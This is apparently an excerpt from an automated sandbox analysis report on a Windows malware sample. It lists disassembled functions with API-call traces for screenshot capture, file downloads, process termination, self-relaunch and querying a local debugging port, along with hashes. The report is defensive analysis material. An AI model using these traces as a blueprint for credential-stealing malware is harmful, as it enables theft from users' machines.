                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 7fe6b1185dbec1dc12b2036b5a124229cec86f7235e9730fdde2268d315e62f0
                                • Instruction ID: fe2e337e6205a436a30cb832379daeaa99fc5fa8fcd3743a24c3953b9d50dc43
                                • Opcode Fuzzy Hash: 7fe6b1185dbec1dc12b2036b5a124229cec86f7235e9730fdde2268d315e62f0
                                • Instruction Fuzzy Hash: 8951B571600209ABDB10DFA9DC45BEEF7B9EF44710F14416BF605E3380DBB8AA448B69
                                Function 004F1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004F16A1
                                • lstrcpy.KERNEL32(00000000,00CEA6D8), ref: 004F16CC
                                • lstrlen.KERNEL32(?), ref: 004F16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 004F1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F172A
                                • lstrlen.KERNEL32(00CFEB88), ref: 004F173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1762
                                • lstrcat.KERNEL32(00000000,00CFEB88), ref: 004F176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1792
                                • ShellExecuteEx.SHELL32(?), ref: 004F17CD
                                • ExitProcess.KERNEL32 ref: 004F1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: 019a1c34fcb340552879af408795401c9222e170832ab84a674c94bdeb1e9642
                                • Instruction ID: b8883e071652c99754d99e0452391950476b514c4ffc2be6875152ed8e5b9f1c
                                • Opcode Fuzzy Hash: 019a1c34fcb340552879af408795401c9222e170832ab84a674c94bdeb1e9642
                                • Instruction Fuzzy Hash: 78517771A0121EDBDB11EFA5CD9469FB7F9AF54300F04816AE605E3361DF78AE018B58
                                Function 004EEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004EF026
                                • lstrlen.KERNEL32(00000000), ref: 004EF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004EF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 004EF081
                                • lstrlen.KERNEL32(?), ref: 004EF094
                                • lstrlen.KERNEL32(00000000), ref: 004EF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 004EF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 004EF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 5bb75e6c2d24f8df123465317be942f599fa10fca9663de91c69b1aca5cab48b
                                • Instruction ID: 06cf960b8f215729b7a6e32064811d37c5cae8295e7b360e56c49c0e0a7b28d2
                                • Opcode Fuzzy Hash: 5bb75e6c2d24f8df123465317be942f599fa10fca9663de91c69b1aca5cab48b
                                • Instruction Fuzzy Hash: 29510E31A102559FCB21AF36CC59A6FB7A4EF50305F04916FF84A9B312DA38EC058B98
                                Function 004DA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00CF91D0,00709BD8,0000FFFF), ref: 004DA026
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DA053
                                • lstrlen.KERNEL32(00709BD8), ref: 004DA060
                                • lstrcpy.KERNEL32(00000000,00709BD8), ref: 004DA08A
                                • lstrlen.KERNEL32(00504C4C), ref: 004DA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DA0B2
                                • lstrcat.KERNEL32(00000000,00504C4C), ref: 004DA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DA114
                                • SetEnvironmentVariableA.KERNEL32(00CF91D0,00000000), ref: 004DA12F
                                • LoadLibraryA.KERNEL32(00CE6358), ref: 004DA143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 79693965c8e1d9beb00d082c529f92e69ec2b9947e9c2580b9a8cf849f8b8b11
                                • Instruction ID: 0140c63ea419772cbaf507918ea9a14b0e2998d2f1d903f8263e84937364dd75
                                • Opcode Fuzzy Hash: 79693965c8e1d9beb00d082c529f92e69ec2b9947e9c2580b9a8cf849f8b8b11
                                • Instruction Fuzzy Hash: 2B91C270600A10DFD7319FA5DC68A6737A5EB54704F40826BE9458B3A2EFBDDC508B8B
                                Function 004EC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EC8A2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EC8D1
                                • lstrlen.KERNEL32(00000000), ref: 004EC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EC932
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004EC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: e1839361437b3f105f23f2ed77e67041a19f182f17934142969a8f87fe2d1fb3
                                • Instruction ID: f66afa9d1f00e3d01e0d95768205e7d4349ee2f6ac622da137ad7aaeb32b34e8
                                • Opcode Fuzzy Hash: e1839361437b3f105f23f2ed77e67041a19f182f17934142969a8f87fe2d1fb3
                                • Instruction Fuzzy Hash: 6B61C5B1E002599BDB10EFB6C984BAF7BB8BF15305F00416BE841E7351DB7C89028B98
                                Function 004F41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,004F0CF0), ref: 004F4276
                                • GetDesktopWindow.USER32 ref: 004F4280
                                • GetWindowRect.USER32(00000000,?), ref: 004F428D
                                • SelectObject.GDI32(00000000,00000000), ref: 004F42BF
                                • GetHGlobalFromStream.COMBASE(004F0CF0,?), ref: 004F4336
                                • GlobalLock.KERNEL32(?), ref: 004F4340
                                • GlobalSize.KERNEL32(?), ref: 004F434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 57ef4cece10a1f88f82eb48ee71cad3b6671e2e547b1cf47d677c1b4c9812b7e
                                • Instruction ID: 2f83d7b9e47b8d14ea7f1315e8ddd63a837a8798665201ff5231fbeeb38711b3
                                • Opcode Fuzzy Hash: 57ef4cece10a1f88f82eb48ee71cad3b6671e2e547b1cf47d677c1b4c9812b7e
                                • Instruction Fuzzy Hash: 7D511E75A10209EFDB10DFA4DD85AAE77B9EF48304F10451AFA05E3351DF78AD018BA5
                                Function 004EDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,00CFF840), ref: 004EE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE07D
                                • lstrcat.KERNEL32(?,?), ref: 004EE098
                                • lstrcat.KERNEL32(?,?), ref: 004EE0AC
                                • lstrcat.KERNEL32(?,00CEA7C8), ref: 004EE0C0
                                • lstrcat.KERNEL32(?,?), ref: 004EE0D4
                                • lstrcat.KERNEL32(?,00CFE580), ref: 004EE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004EE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 9c44279b41598d137ccb0b935404423ce2a3eaf569c329626e2bf09f066d5530
                                • Instruction ID: 35a6d93a1331ab8a3d07a0928c4d48063616f2403d2c5d1c4efa39df936ddd1d
                                • Opcode Fuzzy Hash: 9c44279b41598d137ccb0b935404423ce2a3eaf569c329626e2bf09f066d5530
                                • Instruction Fuzzy Hash: 4161AD71A1012CEBCB61DB65CC54ADEB3B4BF58300F1089AAE649A3351DF789F858F94
                                Function 004D6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D6AFF
                                • InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D6B2C
                                • StrCmpCA.SHLWAPI(?,00CFF9E8), ref: 004D6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 004D6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004D6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004D6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004D6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004D6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 004D6C10
                                • InternetCloseHandle.WININET(00000000), ref: 004D6C17
                                • InternetCloseHandle.WININET(?), ref: 004D6C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: dcc25b9da4ed059d5ab0fd5a61e29ab3faf36d5d32fa0a77f18d39b6e0eaba1a
                                • Instruction ID: 67afd75012d5acdbc4acdaf5c49eaa8252ba57948adbad9cb504ea01804d6f8c
                                • Opcode Fuzzy Hash: dcc25b9da4ed059d5ab0fd5a61e29ab3faf36d5d32fa0a77f18d39b6e0eaba1a
                                • Instruction Fuzzy Hash: 5B417E71600219EBDB20DB64DC55FAE77B8EB44704F00855AFA05E7390EF78AE408BA8
                                Function 004F4500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,004E4F39), ref: 004F4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F454C
                                • wsprintfW.USER32 ref: 004F455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004F45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004F45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 004F45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9ON$%hs$9ON
                                • API String ID: 885711575-3811011515
                                • Opcode ID: 54e206e81b8d7e3a2f023422ff1601b2e2e6df8354023b7da70033ef65b16fa7
                                • Instruction ID: 0c6c9818266aad7b704ef983611ab9a56fbbac60e33af81241163804f5b21958
                                • Opcode Fuzzy Hash: 54e206e81b8d7e3a2f023422ff1601b2e2e6df8354023b7da70033ef65b16fa7
                                • Instruction Fuzzy Hash: A9312F71A00209BBDB10DBA4DC49FEF7778AF45700F104155FB05A7190EF78AA458BAA
                                Function 004DBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DBC1F
